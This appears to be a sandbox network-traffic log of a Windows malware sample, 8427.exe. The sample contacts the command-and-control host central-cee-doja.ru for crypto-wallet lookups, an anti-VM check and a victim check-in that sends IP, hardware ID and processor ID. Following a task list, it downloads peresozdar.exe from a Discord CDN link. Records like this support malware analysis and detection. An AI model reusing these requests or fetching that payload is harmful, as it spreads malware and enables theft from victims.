2023-11-18 09:02:53 UTC	10506	OUT	GET /getwallet.php?id=1444&wallet=eth HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:53 UTC	10507	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cYqHLbOAcLkxUGAbNOMPXKKTDxHq9%2BS0dY6Z8VwbzwuAv0TReknPxyO7OKKkQWbWDGzQTTAU1YuGsRjcJ%2Fh703WldFEccqofIsKvviAC7auPfeAXTAne4KEPdZcvWThNN8NtcHYZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09806d956808-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:53 UTC	10507	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49772	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:53 UTC	10506	OUT	GET /getwallet.php?id=1444&wallet=eth HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:53 UTC	10507	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cYqHLbOAcLkxUGAbNOMPXKKTDxHq9%2BS0dY6Z8VwbzwuAv0TReknPxyO7OKKkQWbWDGzQTTAU1YuGsRjcJ%2Fh703WldFEccqofIsKvviAC7auPfeAXTAne4KEPdZcvWThNN8NtcHYZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09806d956808-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:53 UTC	10507	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49774	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:54 UTC	10507	OUT	GET /getwallet.php?id=1444&wallet=xmr HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:55 UTC	10507	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZTTviCcrQrWrsmrKM5XsWwp1RJ87Txm%2BuSLt%2FoV5wHswvfoOgVVYkYS73KDwKXoFHstKBkA78he%2FzxXQALE5%2BPqKqHuid%2FAA%2FJBSLdfTgnJAW1g1x39v6GxmkpjEIpy9UsyFG0nV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0986dffcc5a0-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:55 UTC	10508	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	104.21.89.193	443	192.168.2.4	49774	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:54 UTC	10507	OUT	GET /getwallet.php?id=1444&wallet=xmr HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:55 UTC	10507	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZTTviCcrQrWrsmrKM5XsWwp1RJ87Txm%2BuSLt%2FoV5wHswvfoOgVVYkYS73KDwKXoFHstKBkA78he%2FzxXQALE5%2BPqKqHuid%2FAA%2FJBSLdfTgnJAW1g1x39v6GxmkpjEIpy9UsyFG0nV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0986dffcc5a0-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:55 UTC	10508	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	104.21.89.193	443	192.168.2.4	49742	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:31 UTC	12	OUT	GET //antivm.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:02:32 UTC	13	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pKtcAgHsQtqnYAQIhUE0S8dT%2FYvx2OygEcDllaPSyISQ0as7ke6MNSObXO8HxHrhAzVuRCphJSCqm40dT3a9VDoaIigbmiN3%2BDagYZBzTBE3XdkJrNiiLWtQSJqUHQOOiMsDDVvN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f08fb3859c71d-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:32 UTC	13	IN	Data Raw: 32 0d 0a 4e 4f 0d 0a Data Ascii: 2NO
2023-11-18 09:02:32 UTC	13	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49742	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:31 UTC	12	OUT	GET //antivm.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:02:32 UTC	13	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pKtcAgHsQtqnYAQIhUE0S8dT%2FYvx2OygEcDllaPSyISQ0as7ke6MNSObXO8HxHrhAzVuRCphJSCqm40dT3a9VDoaIigbmiN3%2BDagYZBzTBE3XdkJrNiiLWtQSJqUHQOOiMsDDVvN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f08fb3859c71d-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:32 UTC	13	IN	Data Raw: 32 0d 0a 4e 4f 0d 0a Data Ascii: 2NO
2023-11-18 09:02:32 UTC	13	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49775	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:54 UTC	10507	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:55 UTC	10508	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=99f8uJh5NoaajYF7ITBRet2QT02hbO8wyRhh0xgFHqYNbr3ijfRuQKXPr2YCXkH4BHkeZD8%2F08P1MckXcjZoav8SzkH%2B%2BW%2BeRsqmUfiXYOsH8yP%2FGQwcy8Tffl9wjOmcdoPhrQtH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0988fbe0c49d-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:55 UTC	10509	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:02:55 UTC	10509	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	104.21.89.193	443	192.168.2.4	49775	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:54 UTC	10507	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:55 UTC	10508	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=99f8uJh5NoaajYF7ITBRet2QT02hbO8wyRhh0xgFHqYNbr3ijfRuQKXPr2YCXkH4BHkeZD8%2F08P1MckXcjZoav8SzkH%2B%2BW%2BeRsqmUfiXYOsH8yP%2FGQwcy8Tffl9wjOmcdoPhrQtH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0988fbe0c49d-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:55 UTC	10509	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:02:55 UTC	10509	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	104.21.89.193	443	192.168.2.4	49777	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:55 UTC	10509	OUT	GET /getwallet.php?id=1444&wallet=xlm HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:56 UTC	10509	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=giSGYl6OWQzgFEu1OaXhZ78H%2FSx39VHfIRjKubZ5zvG%2By6os5lQ5qvC1srC74zeXo%2BQCBGRWdR0mtOLfoIba%2BCSXYZF8U9NbGpX59bRjw7p9QiyZLdr9XKZz9PrQnURaSb8TLm0t"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f098debb730e9-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:56 UTC	10509	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49777	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:55 UTC	10509	OUT	GET /getwallet.php?id=1444&wallet=xlm HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:56 UTC	10509	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=giSGYl6OWQzgFEu1OaXhZ78H%2FSx39VHfIRjKubZ5zvG%2By6os5lQ5qvC1srC74zeXo%2BQCBGRWdR0mtOLfoIba%2BCSXYZF8U9NbGpX59bRjw7p9QiyZLdr9XKZz9PrQnURaSb8TLm0t"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f098debb730e9-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:56 UTC	10509	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	104.21.89.193	443	192.168.2.4	49778	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:55 UTC	10509	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:56 UTC	10509	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3hYEDuzNZ8ZQiQnFbh9gPBzoyXnd%2FojyUTGDlJdrt%2BS1lZupBNpia1v3dOqE7Jc6XuG1pWv%2Fgd5AsxbcAfT3vrxpOnqzLUvbpsEtLvKpahBjacJnG4n1kUskuvK0H%2BhS%2BfYw%2FHkI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f098f7a44c392-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:56 UTC	10510	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:02:56 UTC	10510	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49778	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:55 UTC	10509	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:56 UTC	10509	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3hYEDuzNZ8ZQiQnFbh9gPBzoyXnd%2FojyUTGDlJdrt%2BS1lZupBNpia1v3dOqE7Jc6XuG1pWv%2Fgd5AsxbcAfT3vrxpOnqzLUvbpsEtLvKpahBjacJnG4n1kUskuvK0H%2BhS%2BfYw%2FHkI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f098f7a44c392-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:56 UTC	10510	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:02:56 UTC	10510	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49780	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:56 UTC	10509	OUT	GET /getwallet.php?id=1444&wallet=xrp HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:57 UTC	10510	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bi0gma%2F2%2B1wRDzk9e8eB%2Baq%2F0PxIX%2Fa5dkGGG%2F4WE%2BXdPJbmHqvc7hBARumFXYqHEMsJsbUv3EC7H3JT8DBXGAhCDsNxWY09V5cC3JXpqrtT7T%2BBbqQDXLYEHTx1Lji6uxCv%2Bbue"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09943c3debb3-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:57 UTC	10511	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	104.21.89.193	443	192.168.2.4	49780	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:56 UTC	10509	OUT	GET /getwallet.php?id=1444&wallet=xrp HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:57 UTC	10510	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bi0gma%2F2%2B1wRDzk9e8eB%2Baq%2F0PxIX%2Fa5dkGGG%2F4WE%2BXdPJbmHqvc7hBARumFXYqHEMsJsbUv3EC7H3JT8DBXGAhCDsNxWY09V5cC3JXpqrtT7T%2BBbqQDXLYEHTx1Lji6uxCv%2Bbue"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09943c3debb3-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:57 UTC	10511	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49781	162.159.135.233	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:56 UTC	10510	OUT	GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	162.159.135.233	443	192.168.2.4	49781	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:56 UTC	10510	OUT	GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	104.21.89.193	443	192.168.2.4	49784	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:57 UTC	10511	OUT	GET /getwallet.php?id=1444&wallet=ltc HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:58 UTC	10511	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rto1jJyVFOUyiTVYItnvL38iSPVUG7VwWrz2lsUMbSZ77av3dDYlKz7%2BS1gXXE2maUpkZ28M1hm0QPLkiqa9TQAkZ71OobhwycMLsQY5BUXLJolHOgUarsojSdbR%2FTaiBG2KpUyd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f099a9a3deb73-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:58 UTC	10512	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.4	49784	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:57 UTC	10511	OUT	GET /getwallet.php?id=1444&wallet=ltc HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:58 UTC	10511	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rto1jJyVFOUyiTVYItnvL38iSPVUG7VwWrz2lsUMbSZ77av3dDYlKz7%2BS1gXXE2maUpkZ28M1hm0QPLkiqa9TQAkZ71OobhwycMLsQY5BUXLJolHOgUarsojSdbR%2FTaiBG2KpUyd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f099a9a3deb73-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:58 UTC	10512	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.4	49785	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:57 UTC	10511	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:58 UTC	10512	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hzmaBWbNm4CxnNrzgmAqnDaZelxIjtqV1REwpSMWKLDyWRe5epz0clqAzSf5QcNYcibTdgIIvTrYkR%2F%2FH9PhR%2FdBrMYJBR0eLklVrgBk%2FL2WS6aRNpTvo6BiEUrU2e81h3UrZz%2FD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f099b4a4e30a8-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:58 UTC	10512	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:02:58 UTC	10512	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	104.21.89.193	443	192.168.2.4	49785	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:57 UTC	10511	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:58 UTC	10512	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hzmaBWbNm4CxnNrzgmAqnDaZelxIjtqV1REwpSMWKLDyWRe5epz0clqAzSf5QcNYcibTdgIIvTrYkR%2F%2FH9PhR%2FdBrMYJBR0eLklVrgBk%2FL2WS6aRNpTvo6BiEUrU2e81h3UrZz%2FD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f099b4a4e30a8-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:58 UTC	10512	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:02:58 UTC	10512	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.4	49786	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:58 UTC	10512	OUT	GET /getwallet.php?id=14441&wallet=nec HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:59 UTC	10512	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NsPdvgUbFzm4wzL8t3mwrl34YEikUJ4k4jl9NuSIiosM5fZrrkUzQmt7Y9iWamVF1Oa0u5N1ETLmlPvSDfkEnlDifOqE%2BSkxlSsZb2mHOOB7PD%2F%2Fe5OY%2FMFTtI8MUcfgMHGxrWw6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09a12a5030b2-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:59 UTC	10513	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	104.21.89.193	443	192.168.2.4	49786	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:58 UTC	10512	OUT	GET /getwallet.php?id=14441&wallet=nec HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:59 UTC	10512	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NsPdvgUbFzm4wzL8t3mwrl34YEikUJ4k4jl9NuSIiosM5fZrrkUzQmt7Y9iWamVF1Oa0u5N1ETLmlPvSDfkEnlDifOqE%2BSkxlSsZb2mHOOB7PD%2F%2Fe5OY%2FMFTtI8MUcfgMHGxrWw6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09a12a5030b2-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:59 UTC	10513	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.4	49787	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:58 UTC	10512	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:59 UTC	10513	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y7L4voB1fLVK515O4x80DNkOcBOj8jMuP8UC8wejGBqqZzgO97uj63Ls9efseqk2h2%2B1sDeqvnJ8qPbPikyxIgzvu9KWR%2BbRbtYMsdO9Q70ZsuIwJKu7ocC9a1IwnyCN2Zon0O24"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09a27e95680e-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:59 UTC	10513	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
